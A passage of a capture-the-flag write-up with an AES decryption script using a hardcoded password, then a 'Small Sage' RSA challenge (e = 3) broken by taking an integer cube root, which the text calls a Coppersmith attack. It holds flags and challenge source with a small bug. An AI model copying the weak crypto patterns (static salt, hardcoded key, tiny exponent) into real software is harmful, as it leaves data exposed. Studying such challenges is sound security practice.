13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Protocol.KDF import PBKDF2
import textwrap
def decrypt_file(encrypted_file_path, password):
with open(encrypted_file_path, 'rb') as file:
ciphertext_iv = file.read()
# Extract the IV (Initialization Vector) and ciphertext
ciphertext = ciphertext_iv[:-AES.block_size]
iv = ciphertext_iv[-AES.block_size:]
passwd = textwrap.dedent(password)[:-1]
salt = b'salt123'
key = PBKDF2(passwd.encode(), salt, dkLen=16)
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_data = unpad(cipher.decrypt(ciphertext), AES.block_size)
decrypted_file_path = encrypted_file_path[:-4] # Remove the '.enc' extension
with open(decrypted_file_path, 'wb') as file:
file.write(decrypted_data)
print("Decryption successful. Decrypted file saved as:", decrypted_file_path)
password = "ni5h2h?Yrq8Do?n+|6a;pKbZkv%}O~tV"
encrypted_file_path = "./flag.txt.enc"
decrypt_file(encrypted_file_path, password)
Small Sage [Cryptography]
Flag: ABOH23{rocky0ubrr!}
We are given a file encoded with sage or in another words, SageMath. This challenge was done by my teammate @Damien so credits to him. Reading the code, we see that this is an RSA implementation with small e = 3
and when the exponent of RSA is small, it is vulnerable to Coppersmith Attack
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/env sage
from Crypto.Util.number import bytes_to_long
p, q = random_prime(2 ^ 1024), random_prime(2 ^ 1024)
n = p*q
e = 3
assert len(flag) > e
FLAG = open("flag.txt", "rb").read().strip()
m = bytes_to_long(FLAG + b' is your challenge flag.')
c = pow(m, e, n)
print("N: ", n)
print("C: ", c)
print("e: ", e)
So my teammate created a simple python script to decrypt the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import binascii
import gmpy2
n = 28161864534081810305839467239167774824180698442991360538137338315924601027539535041400325106523598882827263670671140966855944057889837783992080270143420119844958855679728614805589197733901663249220100214524859116110365815705699485099116276988534253521580223115836247118089590595980346272692504104976860138248959015932618979651746563030552421216691329694961700647328850519321776696007920491542096366696034760558758393690945535590284240994579352805664119144134863786797266463118165575746650538843159490903440899114347091988968775074879350009340592457617508211781199057573663246634610497629416920053419998682083393087987
e = 3
cipher_str = 762355112596222421309825166446067448121886093544068458795156044255325081286699861240486430215279901835675723822721970949307265398924333599178805487220325668055743991293697494477706560130827449405781098938392283482757063955895656607033694619449376928780098570577226994800731087835230561205556094959240210387000
gs = gmpy2.mpz(cipher_str)
gm = gmpy2.mpz(n)
ge = gmpy2.mpz(e)
root, exact = gmpy2.iroot(gs, ge)
text_output = binascii.unhexlify(format(root, 'x')).decode('utf-8')
print(text_output)